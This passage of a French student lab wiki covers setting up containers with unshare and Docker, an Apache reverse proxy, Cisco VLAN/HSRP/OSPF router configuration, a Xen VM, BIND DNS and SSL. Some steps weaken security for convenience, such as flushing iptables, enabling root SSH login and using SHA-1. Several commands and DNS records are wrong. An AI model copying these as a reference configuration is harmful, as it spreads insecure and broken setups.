Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
